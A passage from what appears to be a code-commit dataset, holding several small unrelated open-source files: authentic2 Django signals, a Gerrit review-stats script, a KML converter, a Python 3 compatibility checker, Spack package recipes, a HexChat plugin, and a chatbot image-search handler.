- audience: identifier of the destination of attributes (e.g. the providerID
for SAML2).
The return expected is a dictionnaries such as:
- dic = {}
- attributes = {}
- attributes[name] = (value1, value2, )
- attributes[(name, format)] = (value1, value2, )
- attributes[(name, format, nickname)] = (value1, value2, )
- dic['attributes'] = attributes
- return dic
'''
add_attributes_to_response = \
Signal(providing_args = ["request", "user", "audience"])
add_attributes_to_response.connect(provide_attributes_at_sso)
if settings.PUSH_PROFILE_UPDATES:
add_attributes_to_response.connect(provide_attributes_of_user_profile)
'''add_attributes_to_response
Idem as add_attributes_to_response except that the signal sender gives a list
of attribute identifiers. The attribute namespace is obtained from the
provider to which a namespace has been declared.
'''
add_attributes_listed_to_response = \
Signal(providing_args = ["request", "user", "audience", "attributes"])
'''avoid_consent
Expect a boolean e.g. dic['avoid_consent'] = True or False
'''
avoid_consent = Signal(providing_args = ["request", "user", "audience"])
| from django.dispatch import Signal
from authentic2.idp.attributes import provide_attributes_at_sso
'''authorize_decision
Expect a dictionnaries as return with:
- the authorization decision e.g. dic['authz'] = True or False
- optionnaly a message e.g. dic['message'] = message
'''
authorize_service = Signal(providing_args = ["request", "user", "audience"])
'''add_attributes_to_response
This signal is used by asynchronous bindings that do not receive attribute
list in the request. That means that a predefined list is defined.
The asynchronous binding means that the user is "on" the IdP to bring the
request then it is possible to take attributes in the Django session.
Mainly, it is usable at SSO request treatment.
The signal is send with parameters:
- request: The request having triggerred a need of attribute
- user: instance of the User Django Model to indicate the subject of
attributes. Maybe different from request.user if any.
- We should here only use a username in case that we want to provide
attributes for entities having no corresponding User instance.
- audience: identifier of the destination of attributes (e.g. the providerID
for SAML2).
The return expected is a dictionnaries such as:
- dic = {}
- attributes = {}
- attributes[name] = (value1, value2, )
- attributes[(name, format)] = (value1, value2, )
- attributes[(name, format, nickname)] = (value1, value2, )
- dic['attributes'] = attributes
- return dic
'''
add_attributes_to_response = \
Signal(providing_args = ["request", "user", "audience"])
add_attributes_to_response.connect(provide_attributes_at_sso)
'''add_attributes_to_response
Idem as add_attributes_to_response except that the signal sender gives a list
of attribute identifiers. The attribute namespace is obtained from the
provider to which a namespace has been declared.
'''
add_attributes_listed_to_response = \
Signal(providing_args = ["request", "user", "audience", "attributes"])
'''avoid_consent
Expect a boolean e.g. dic['avoid_consent'] = True or False
'''
avoid_consent = Signal(providing_args = ["request", "user", "audience"])
| agpl-3.0 | Python |
88bb5d1a42b817a000f10ec0989282c0998cc1b0 | Add approved and open | JohnGarbutt/reviewstats,cp16net/reviewstats,openstack-infra/reviewstats,cp16net/reviewstats,JohnGarbutt/reviewstats,openstack-infra/reviewstats | openapproved.py | openapproved.py | #!/usr/bin/env python
#
# Copyright (C) 2011 - Soren Hansen
# Copyright (C) 2013 - Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Identify approved and open patches.
Prints out list of approved patches that failed to merge and are currently
still open.
"""
import optparse
import sys
import utils
def main(argv=None):
    """Report approved-but-unmerged changes.

    Queries gerrit for open changes and prints the URL and subject of each
    change whose latest patch set is *not* approved even though an earlier
    patch set was (i.e. the approval was lost to a rebase), followed by a
    total count.  Exits with status 1 when no project is specified.
    """
    if argv is None:
        argv = sys.argv

    optparser = optparse.OptionParser()
    optparser.add_option('-p', '--project', default='projects/nova.json',
            help='JSON file describing the project to generate stats for')
    optparser.add_option('-a', '--all', action='store_true',
            help='Generate stats across all known projects (*.json)')
    optparser.add_option('-u', '--user', default='russellb', help='gerrit user')
    optparser.add_option('-k', '--key', default=None, help='ssh key for gerrit')
    optparser.add_option('-s', '--stable', action='store_true',
            help='Include stable branch commits')
    options, args = optparser.parse_args()

    projects = utils.get_projects_info(options.project, options.all)

    if not projects:
        # print() with a single argument is valid on Python 2 and 3;
        # the original used the Python-2-only print statement.
        print("Please specify a project.")
        sys.exit(1)

    changes = utils.get_changes(projects, options.user, options.key,
                                only_open=True)

    approved_and_rebased = set()
    for change in changes:
        if 'rowCount' in change:
            # Trailing stats row from the gerrit query, not a change.
            continue
        if not options.stable and 'stable' in change['branch']:
            continue
        if change['status'] != 'NEW':
            # Filter out WORKINPROGRESS
            continue
        # Evaluate the latest patch set once, instead of re-checking it
        # for every earlier patch set as the original did.
        if approved(change['patchSets'][-1]):
            continue
        if any(approved(patch_set) for patch_set in change['patchSets'][:-1]):
            approved_and_rebased.add(
                "%s %s" % (change['url'], change['subject']))

    for entry in approved_and_rebased:
        print(entry)
    print("total %d" % len(approved_and_rebased))
def approved(patch_set):
    """Return True if any review on *patch_set* carries an APRV vote."""
    return any(review['type'] == 'APRV'
               for review in patch_set.get('approvals', []))
if __name__ == '__main__':
sys.exit(main())
| apache-2.0 | Python | |
9bfbf6eb6f65fa745d0ef3777ad4486f47c69b87 | Add pose_to_kml.py formatting script | EndPointCorp/lg_ros_nodes,EndPointCorp/lg_ros_nodes,EndPointCorp/lg_ros_nodes,EndPointCorp/lg_ros_nodes,EndPointCorp/lg_ros_nodes,EndPointCorp/lg_ros_nodes | scripts/pose_to_kml.py | scripts/pose_to_kml.py | import sys
import csv
from math import sin, radians, fabs
KML_TEMPLATE = """
<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2" xmlns:gx="http://www.google.com/kml/ext/2.2"
xmlns:kml="http://www.opengis.net/kml/2.2"
xmlns:atom="http://www.w3.org/2005/Atom">
<Document>
<name>KmlFile</name>
<Placemark>
<name>Placemark 1</name>
<LookAt>
<longitude>{lon}</longitude>
<latitude>{lat}</latitude>
<altitude>0</altitude>
<heading>{head}</heading>
<tilt>{tilt}</tilt>
<range>{range}</range>
<gx:altitudeMode>relativeToSeaFloor</gx:altitudeMode>
</LookAt>
<Point>
<gx:drawOrder>1</gx:drawOrder>
<coordinates>{lon},{lat},0</coordinates>
</Point>
</Placemark>
</Document>
</kml>
"""
def parse(data):
    """Extract a LookAt pose from the first row of a rostopic CSV export.

    Returns a dict with 'lat', 'lon', 'head', 'tilt' and 'range' keys, or
    None when *data* has no data rows.  Only the first row is consumed
    (the early return inside the loop is intentional and preserved).
    """
    for row in csv.DictReader(data):
        # In all serious GIS lon is X and lat is Y, but this export
        # swapped them, so position.x carries latitude here.
        tilt = float(row['field.pose.orientation.x'])
        altitude = float(row['field.pose.position.z'])
        # NOTE(review): for tilt near 180 degrees sin() is tiny and the
        # division explodes; the <1-degree guard only covers tilt near
        # zero.  Confirm the expected tilt range with the publisher.
        if fabs(tilt) < 1.0:
            view_range = altitude
        else:
            view_range = altitude / sin(radians(tilt))
        return {
            'lat': float(row['field.pose.position.x']),
            'lon': float(row['field.pose.position.y']),
            'tilt': tilt,
            'head': float(row['field.pose.orientation.y']),
            'range': view_range,
        }
def format_kml(data):
    """Render the pose dict produced by parse() into a KML LookAt document.

    *data* must provide 'lat', 'lon', 'head', 'tilt' and 'range' keys.
    """
    # The template contains only named fields, so the stray positional
    # argument 0 the original passed was dead and has been dropped.
    return KML_TEMPLATE.format(lat=data['lat'],
                               lon=data['lon'],
                               head=data['head'],
                               tilt=data['tilt'],
                               range=data['range'])
if __name__ == "__main__":
    # Read one pose row from stdin and emit the corresponding KML.
    msg = parse(sys.stdin)
    # Portability fix: print() with one argument behaves identically on
    # Python 2 and 3; the original used the Python-2-only print statement.
    print(format_kml(msg))
| apache-2.0 | Python | |
846ce88f199381387f612463da51c6b17281dd21 | Add script for checking Python3 compatibility | google/skia-buildbot,google/skia-buildbot,google/skia-buildbot,google/skia-buildbot,google/skia-buildbot,google/skia-buildbot,google/skia-buildbot,google/skia-buildbot | scripts/check_python3_compatibility.py | scripts/check_python3_compatibility.py | #!/usr/bin/env python
#
# Copyright 2021 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Check for Python scripts which are incompatible with Python 3."""
import ast
import os
import subprocess
import sys
def check_file(fp):
    """Return True if the file at path *fp* parses as valid Python 3.

    The source is parsed with ast.parse, i.e. against the grammar of the
    interpreter running this script, so Python-2-only constructs raise
    SyntaxError and are reported as incompatible.
    """
    # BUG FIX: the original left the file handle open; `with` closes it.
    with open(fp, 'r') as f:
        content = f.read()
    try:
        # ast.parse always returns a Module node on success, so the
        # original's `if not parsed` branch was dead and is removed.
        ast.parse(content)
    except SyntaxError:
        return False
    return True
def check_repo(path):
    """Return the repo-relative paths of tracked .py files under *path*
    that fail check_file (i.e. are not valid Python 3)."""
    output = subprocess.check_output(['git', 'ls-files'], cwd=path)
    incompatible = []
    for raw_name in output.splitlines():
        name = raw_name.decode(sys.stdout.encoding)
        if name.endswith('.py') and not check_file(os.path.join(path, name)):
            incompatible.append(name)
    return incompatible
def __main__(argv):
    """CLI entry point: scan the repo given in argv[1] and list every
    tracked Python file that is not Python-3 compatible.  Exits 1 on
    bad usage or when incompatible files are found."""
    if len(argv) != 2:
        print('Usage: %s <repo path>' % __file__)
        sys.exit(1)
    failures = check_repo(argv[1])
    if failures:
        print('Incompatible Python scripts:')
        for name in failures:
            print(name)
        sys.exit(1)
if __name__ == '__main__':
__main__(sys.argv)
| bsd-3-clause | Python | |
4402506527cbc7dfbf648a90e4e2c665e27a5a34 | Add new package: py-rbtools (#18963) | LLNL/spack,iulian787/spack,iulian787/spack,LLNL/spack,LLNL/spack,iulian787/spack,LLNL/spack,LLNL/spack,iulian787/spack,iulian787/spack | var/spack/repos/builtin/packages/py-rbtools/package.py | var/spack/repos/builtin/packages/py-rbtools/package.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyRbtools(PythonPackage):
    """RBTools is a set of command line tools and a rich Python API for
    use with Review Board."""

    homepage = "https://github.com/reviewboard/rbtools"
    url = "https://github.com/reviewboard/rbtools/archive/release-1.0.2.tar.gz"

    # Release tarballs fetched from GitHub; checksums pin each archive.
    version('1.0.2', sha256='dd7aa95691be91f394d085120e44bcec3dc440b01a8f7e2742e09a8d756c831c')
    version('1.0.1', sha256='bc5e3c511a2273ec61c43a82f56b4cef0b23beae81e277cecbb37ce6761edf29')
    version('1.0', sha256='dbab2cc89d798462c7e74952d43ba1ff1c97eb9c8f92876e600c6520f72454c9')

    # RBTools supports both Python 2.7 and Python 3.5+.
    depends_on('python@2.7:2.8,3.5:', type=('build', 'run'))
    depends_on('py-setuptools', type=('build', 'run'))
    depends_on('py-colorama', type=('build', 'run'))
    depends_on('py-texttable', type=('build', 'run'))
    depends_on('py-tqdm', type=('build', 'run'))
    depends_on('py-six@1.8.0:', type=('build', 'run'))
    # Terminal-size backport is only needed on Python 2.
    depends_on('py-backports-shutil-get-terminal-size', when='^python@:2', type=('build', 'run'))
| lgpl-2.1 | Python | |
88d9e6bd216bee0c78f437bdf15362efbebe2e0b | Create new package. (#6504) | mfherbst/spack,iulian787/spack,mfherbst/spack,LLNL/spack,LLNL/spack,EmreAtes/spack,matthiasdiener/spack,matthiasdiener/spack,iulian787/spack,tmerrick1/spack,iulian787/spack,tmerrick1/spack,LLNL/spack,LLNL/spack,tmerrick1/spack,LLNL/spack,matthiasdiener/spack,EmreAtes/spack,mfherbst/spack,krafczyk/spack,iulian787/spack,matthiasdiener/spack,krafczyk/spack,krafczyk/spack,krafczyk/spack,mfherbst/spack,EmreAtes/spack,tmerrick1/spack,mfherbst/spack,tmerrick1/spack,EmreAtes/spack,krafczyk/spack,iulian787/spack,EmreAtes/spack,matthiasdiener/spack | var/spack/repos/builtin/packages/r-bookdown/package.py | var/spack/repos/builtin/packages/r-bookdown/package.py | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RBookdown(RPackage):
    """Output formats and utilities for authoring books and technical
    documents with R Markdown."""

    homepage = "https://cran.r-project.org/package=bookdown"
    url = "https://cran.rstudio.com/src/contrib/bookdown_0.5.tar.gz"
    list_url = "https://cran.rstudio.com/src/contrib/Archive/bookdown"

    version('0.5', '7bad360948e2b22d28397870b9319f17')

    # Minimum versions of the R Markdown toolchain required by bookdown 0.5.
    depends_on('r-yaml@2.1.14:', type=('build', 'run'))
    depends_on('r-rmarkdown@1.5:', type=('build', 'run'))
    depends_on('r-knitr@1.16:', type=('build', 'run'))
    depends_on('r-htmltools@0.3.6:', type=('build', 'run'))
| lgpl-2.1 | Python | |
5558cce438134c722a8c96d7d2badc03b6fd45f5 | Create new package. (#6214) | matthiasdiener/spack,LLNL/spack,LLNL/spack,krafczyk/spack,tmerrick1/spack,krafczyk/spack,skosukhin/spack,krafczyk/spack,matthiasdiener/spack,tmerrick1/spack,mfherbst/spack,matthiasdiener/spack,skosukhin/spack,mfherbst/spack,EmreAtes/spack,mfherbst/spack,tmerrick1/spack,LLNL/spack,matthiasdiener/spack,matthiasdiener/spack,LLNL/spack,krafczyk/spack,EmreAtes/spack,LLNL/spack,krafczyk/spack,EmreAtes/spack,skosukhin/spack,iulian787/spack,iulian787/spack,skosukhin/spack,skosukhin/spack,iulian787/spack,tmerrick1/spack,iulian787/spack,mfherbst/spack,EmreAtes/spack,tmerrick1/spack,iulian787/spack,mfherbst/spack,EmreAtes/spack | var/spack/repos/builtin/packages/r-fracdiff/package.py | var/spack/repos/builtin/packages/r-fracdiff/package.py | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RFracdiff(RPackage):
    """Maximum likelihood estimation of the parameters of a
    fractionally differenced ARIMA(p,d,q) model (Haslett and
    Raftery, Appl.Statistics, 1989)."""

    homepage = "https://cran.r-project.org/package=fracdiff"
    url = "https://cran.r-project.org/src/contrib/fracdiff_1.4-2.tar.gz"
    list_url = "https://cran.r-project.org/src/contrib/Archive/fracdiff"

    # Single packaged release; the second argument is the md5 checksum.
    version('1.4-2', '6a6977d175ad963d9675736a8f8d41f7')
| lgpl-2.1 | Python | |
28c6f1ddc23ee170522b1225bbf60f9b1d244189 | Add new package: logrotate (#18786) | LLNL/spack,LLNL/spack,iulian787/spack,iulian787/spack,iulian787/spack,iulian787/spack,LLNL/spack,LLNL/spack,iulian787/spack,LLNL/spack | var/spack/repos/builtin/packages/logrotate/package.py | var/spack/repos/builtin/packages/logrotate/package.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Logrotate(AutotoolsPackage):
    """The logrotate utility is designed to simplify the administration of
    log files on a system which generates a lot of log files. """

    homepage = "https://github.com/logrotate/logrotate"
    url = "https://github.com/logrotate/logrotate/archive/3.17.0.tar.gz"

    version('3.17.0', sha256='c25ea219018b024988b791e91e9f6070c34d2056efa6ffed878067866c0ed765')
    version('3.16.0', sha256='bc6acfd09925045d48b5ff553c24c567cfd5f59d513c4ac34bfb51fa6b79dc8a')
    version('3.15.1', sha256='a7b20f5184c9598c36546f9200d3bd616d561478a0423ab8074e97a1cd7b1c25')

    # GitHub archives ship no pre-generated configure script, so the full
    # autotools chain is needed at build time.
    depends_on('autoconf', type='build')
    depends_on('automake', type='build')
    depends_on('libtool', type='build')
    depends_on('m4', type='build')
    depends_on('popt')
    depends_on('acl')

    def setup_run_environment(self, env):
        """Expose the sbin directory, where logrotate installs, on PATH."""
        env.prepend_path('PATH', self.prefix.sbin)
| lgpl-2.1 | Python | |
8fe2be0010e45f6b2ba339f5a7fe350bb7efed42 | add new package (#24045) | LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack | var/spack/repos/builtin/packages/py-nipype/package.py | var/spack/repos/builtin/packages/py-nipype/package.py | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyNipype(PythonPackage):
    """Neuroimaging in Python: Pipelines and Interfaces."""

    homepage = "http://nipy.org/nipype"
    pypi = "nipype/nipype-1.6.0.tar.gz"

    version('1.6.0', sha256='bc56ce63f74c9a9a23c6edeaf77631377e8ad2bea928c898cc89527a47f101cf')

    depends_on('python@3.6:', type=('build', 'run'))
    depends_on('py-setuptools', type='build')
    depends_on('py-click@6.6.0:', type=('build', 'run'))
    depends_on('py-networkx@2.0:', type=('build', 'run'))
    depends_on('py-nibabel@2.1.0:', type=('build', 'run'))
    # The required numpy minimum depends on the Python minor version.
    depends_on('py-numpy@1.13:', type=('build', 'run'), when='^python@:3.6.999')
    depends_on('py-numpy@1.15.3:', type=('build', 'run'), when='^python@3.7:')
    depends_on('py-packaging', type=('build', 'run'))
    depends_on('py-prov@1.5.2:', type=('build', 'run'))
    depends_on('py-pydot@1.2.3:', type=('build', 'run'))
    depends_on('py-python-dateutil@2.2:', type=('build', 'run'))
    depends_on('py-rdflib@5.0.0:', type=('build', 'run'))
    depends_on('py-scipy@0.14:', type=('build', 'run'))
    depends_on('py-simplejson@3.8.0:', type=('build', 'run'))
    depends_on('py-traits@4.6:4.99,5.1:', type=('build', 'run'))
    depends_on('py-filelock@3.0.0:', type=('build', 'run'))
    depends_on('py-etelemetry@0.2.0:', type=('build', 'run'))
| lgpl-2.1 | Python | |
9363331f96805bcc180a081cf9d28b5dab70e25b | Create undoclose.py | TingPing/plugins,TingPing/plugins | HexChat/undoclose.py | HexChat/undoclose.py | from sys import platform
from collections import deque
import hexchat
__module_name__ = "Undo Close"
__module_version__ = "0.1"
__module_description__ = "Adds keybinding to undo close tab"
__module_author__ = "TingPing"
# Per-platform modifier-mask string for Ctrl+Shift in HexChat Key Press
# events.  NOTE(review): values presumed to match what HexChat reports on
# each platform -- confirm against HexChat's Key Press documentation.
if platform == 'win32':
    shiftctrlmod = '5'
elif platform == 'darwin':
    shiftctrlmod = '268435473'
else:
    shiftctrlmod = '21'

# Most recently closed channels (as irc:// URLs), newest last; bounded so
# the history cannot grow without limit.
close_history = deque(maxlen=30)
def contextclosed_cb(word, word_eol, userdata):
    """Record the channel being closed as an irc:// URL in close_history."""
    ctx = hexchat.get_context()
    for entry in hexchat.get_list('channels'):
        if entry.context == ctx:
            # Type 2 is a channel; ignore server tabs, queries, etc.
            if entry.type != 2:
                return
    # Prefer the network name; fall back to the raw server name.
    network = hexchat.get_info('network') or hexchat.get_info('server')
    if not network:
        return
    channel = hexchat.get_info('channel')
    if not channel:
        return
    close_history.append('irc://{}/{}'.format(network, channel))
def keypress_cb(word, word_eol, userdata):
    """On Ctrl+Shift+T, reopen the most recently closed channel."""
    pressed = (word[0], word[1])
    if pressed != ('84', shiftctrlmod):  # keyval '84' is the T key
        return
    try:
        last_closed = close_history.pop()
    except IndexError:
        # Nothing has been closed yet.
        return
    hexchat.command('url {}'.format(last_closed))
hexchat.hook_print("Close Context", contextclosed_cb)
hexchat.hook_print('Key Press', keypress_cb)
| mit | Python | |
37cc64eec2681c4a1e8d3ad3c7f5971ce4c0c6e8 | add home view | SimonJakubowski/pyKitty,SimonJakubowski/pyKitty | kitty/views.py | kitty/views.py | from django.shortcuts import render_to_response
def home(request):
return render_to_response('welcome_page.html') | mit | Python | |
f226ab5b8ecd4faa80a349ab033702d716a6864c | Add initial migration | lnhubbell/Timers,lnhubbell/Timers | timer/migrations/0001_initial.py | timer/migrations/0001_initial.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Initial schema: creates the Timer table with a display name and a
    # duration stored as whole seconds.

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Timer',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=255)),
                ('seconds', models.PositiveIntegerField(default=0, verbose_name=b'Time in Seconds')),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
| mit | Python | |
e3665928c80da9df192f8edb5dc28e3200e34fdc | Add a "image me [thing]" handler | tgerdes/toolbot,tgerdes/toolbot | toolbot/scripts/google_images.py | toolbot/scripts/google_images.py | import re
import json
import asyncio
import random
import aiohttp
GOOGLE_IMAGE_API = 'http://ajax.googleapis.com/ajax/services/search/images'
def plugin(bot):
    # Toolbot entry point: registers the "image me <query>" responder.
    @bot.respond(re.compile(r'(image|img)( me)? (.*)', re.I))
    def image_me(msg):
        # Group 3 of the match is the search phrase; the lookup runs as a
        # background task and replies with a random result URL.
        asyncio.Task(imageMe(msg, msg.match.group(3), cb=msg.reply))
@asyncio.coroutine
def imageMe(msg, query, animated=False, faces=False, cb=None):
    """Query the Google Image Search AJAX API for *query* and pass one
    random result URL to *cb*.  *animated*/*faces* narrow the image type
    (mutually exclusive; *animated* wins).  Does nothing on zero results.
    """
    q = {'v': '1.0', 'rsz': '8', 'q': query, 'safe': 'active'}
    if animated:
        q['imgtype'] = 'animated'
    elif faces:
        q['imgtype'] = 'face'
    resp = yield from aiohttp.request("get", GOOGLE_IMAGE_API, params=q)
    data = yield from resp.read()
    # NOTE(review): assumes the response always carries
    # responseData.results -- an API error payload would raise here.
    images = json.loads(data.decode('utf8'))['responseData']['results']
    if images:
        img = random.choice(images)
        cb(ensureImageExtension(img['unescapedUrl']))
def ensureImageExtension(url):
    """Return *url*, appending '.png' unless it already ends with a
    recognized image extension (png/jpeg/jpg/gif, case-insensitive)."""
    parts = url.rsplit('.', 1)
    # BUG FIX: the original indexed [1] unconditionally and raised
    # IndexError for URLs containing no dot at all.
    if len(parts) == 2 and parts[1].lower() in ('png', 'jpeg', 'jpg', 'gif'):
        return url
    return url + ".png"
| mit | Python | |
fbc5b10b977d20cff340cfb130cec22d49842b5a | Add repos admin | polyaxon/polyaxon,polyaxon/polyaxon,polyaxon/polyaxon | api/repos/admin.py | api/repos/admin.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from django.contrib import admin
from repos.models import Repo, ExternalRepo
# Expose the repo models in the Django admin with the default ModelAdmin.
admin.site.register(Repo)
admin.site.register(ExternalRepo)
| apache-2.0 | Python | |
f1189f4774e469e39097e4d10159425a9ed40757 | Bump version to 2013.1 | JioCloud/nova,yrobla/nova,Brocade-OpenSource/OpenStack-DNRM-Nova,virtualopensystems/nova,rajalokan/nova,ewindisch/nova,orbitfp7/nova,sridevikoushik31/nova,cloudbase/nova,klmitch/nova,bigswitch/nova,LoHChina/nova,sridevikoushik31/nova,OpenAcademy-OpenStack/nova-scheduler,devendermishrajio/nova,yatinkumbhare/openstack-nova,thomasem/nova,sacharya/nova,rajalokan/nova,ewindisch/nova,belmiromoreira/nova,maheshp/novatest,rickerc/nova_audit,tealover/nova,vmturbo/nova,double12gzh/nova,JioCloud/nova,cyx1231st/nova,zaina/nova,nikesh-mahalka/nova,isyippee/nova,aristanetworks/arista-ovs-nova,mgagne/nova,ruslanloman/nova,zzicewind/nova,Triv90/Nova,Yuriy-Leonov/nova,akash1808/nova_test_latest,mikalstill/nova,Metaswitch/calico-nova,petrutlucian94/nova,scripnichenko/nova,angdraug/nova,varunarya10/nova_test_latest,vmturbo/nova,fnordahl/nova,zhimin711/nova,citrix-openstack-build/nova,Francis-Liu/animated-broccoli,shootstar/novatest,leilihh/novaha,imsplitbit/nova,zaina/nova,Stavitsky/nova,sebrandon1/nova,SUSE-Cloud/nova,alaski/nova,aristanetworks/arista-ovs-nova,tanglei528/nova,mandeepdhami/nova,BeyondTheClouds/nova,rahulunair/nova,maheshp/novatest,aristanetworks/arista-ovs-nova,ted-gould/nova,viggates/nova,fnordahl/nova,Stavitsky/nova,whitepages/nova,fajoy/nova,mmnelemane/nova,luogangyi/bcec-nova,tangfeixiong/nova,Juniper/nova,projectcalico/calico-nova,redhat-openstack/nova,apporc/nova,rickerc/nova_audit,spring-week-topos/nova-week,cernops/nova,CEG-FYP-OpenStack/scheduler,shail2810/nova,raildo/nova,plumgrid/plumgrid-nova,berrange/nova,klmitch/nova,petrutlucian94/nova,jianghuaw/nova,cernops/nova,bigswitch/nova,barnsnake351/nova,tanglei528/nova,openstack/nova,TwinkleChawla/nova,openstack/nova,gspilio/nova,redhat-openstack/nova,Yusuke1987/openstack_template,cloudbase/nova-virtualbox,akash1808/nova,rahulunair/nova,devendermishrajio/nova_test_latest,jianghuaw/nova,tianweizhang/nova,mikalstill/nova,CloudServer/nova,vladikr/
nova_drafts,TieWei/nova,Tehsmash/nova,cloudbase/nova,Tehsmash/nova,sridevikoushik31/openstack,cloudbau/nova,affo/nova,Brocade-OpenSource/OpenStack-DNRM-Nova,nikesh-mahalka/nova,felixma/nova,fajoy/nova,BeyondTheClouds/nova,phenoxim/nova,Juniper/nova,takeshineshiro/nova,JioCloud/nova_test_latest,hanlind/nova,rrader/nova-docker-plugin,vmturbo/nova,iuliat/nova,eharney/nova,badock/nova,akash1808/nova_test_latest,joker946/nova,dawnpower/nova,j-carpentier/nova,NeCTAR-RC/nova,cloudbase/nova,mmnelemane/nova,saleemjaveds/https-github.com-openstack-nova,alaski/nova,alexandrucoman/vbox-nova-driver,gspilio/nova,bgxavier/nova,vladikr/nova_drafts,double12gzh/nova,saleemjaveds/https-github.com-openstack-nova,eonpatapon/nova,alexandrucoman/vbox-nova-driver,CloudServer/nova,TieWei/nova,alvarolopez/nova,eharney/nova,maelnor/nova,usc-isi/nova,barnsnake351/nova,mahak/nova,cloudbase/nova-virtualbox,usc-isi/nova,hanlind/nova,watonyweng/nova,projectcalico/calico-nova,BeyondTheClouds/nova,thomasem/nova,ruslanloman/nova,luogangyi/bcec-nova,kimjaejoong/nova,badock/nova,DirectXMan12/nova-hacking,gooddata/openstack-nova,virtualopensystems/nova,jeffrey4l/nova,jianghuaw/nova,mahak/nova,DirectXMan12/nova-hacking,CEG-FYP-OpenStack/scheduler,tangfeixiong/nova,maoy/zknova,sridevikoushik31/openstack,isyippee/nova,fajoy/nova,maoy/zknova,sridevikoushik31/nova,DirectXMan12/nova-hacking,silenceli/nova,NeCTAR-RC/nova,belmiromoreira/nova,mandeepdhami/nova,ntt-sic/nova,leilihh/nova,shahar-stratoscale/nova,sebrandon1/nova,sridevikoushik31/openstack,edulramirez/nova,jianghuaw/nova,MountainWei/nova,gooddata/openstack-nova,houshengbo/nova_vmware_compute_driver,Metaswitch/calico-nova,maelnor/nova,tealover/nova,MountainWei/nova,phenoxim/nova,silenceli/nova,dims/nova,shail2810/nova,varunarya10/nova_test_latest,yrobla/nova,gooddata/openstack-nova,Yuriy-Leonov/nova,mgagne/nova,felixma/nova,yatinkumbhare/openstack-nova,cernops/nova,cyx1231st/nova,rajalokan/nova,maoy/zknova,sacharya/nova,eayunstack/nova,alvarolopez/nov
a,Juniper/nova,joker946/nova,spring-week-topos/nova-week,noironetworks/nova,kimjaejoong/nova,maheshp/novatest,Francis-Liu/animated-broccoli,petrutlucian94/nova_dev,yosshy/nova,Yusuke1987/openstack_template,rajalokan/nova,blueboxgroup/nova,dstroppa/openstack-smartos-nova-grizzly,edulramirez/nova,j-carpentier/nova,adelina-t/nova,leilihh/nova,yrobla/nova,orbitfp7/nova,qwefi/nova,mikalstill/nova,JianyuWang/nova,klmitch/nova,leilihh/novaha,CiscoSystems/nova,ntt-sic/nova,JioCloud/nova_test_latest,devoid/nova,JianyuWang/nova,openstack/nova,shootstar/novatest,shahar-stratoscale/nova,houshengbo/nova_vmware_compute_driver,affo/nova,sebrandon1/nova,devoid/nova,devendermishrajio/nova_test_latest,usc-isi/nova,zhimin711/nova,CiscoSystems/nova,watonyweng/nova,apporc/nova,blueboxgroup/nova,gspilio/nova,viggates/nova,gooddata/openstack-nova,tudorvio/nova,Triv90/Nova,zzicewind/nova,rrader/nova-docker-plugin,bgxavier/nova,tianweizhang/nova,dims/nova,tudorvio/nova,scripnichenko/nova,SUSE-Cloud/nova,CCI-MOC/nova,qwefi/nova,Triv90/Nova,raildo/nova,jeffrey4l/nova,eonpatapon/nova,OpenAc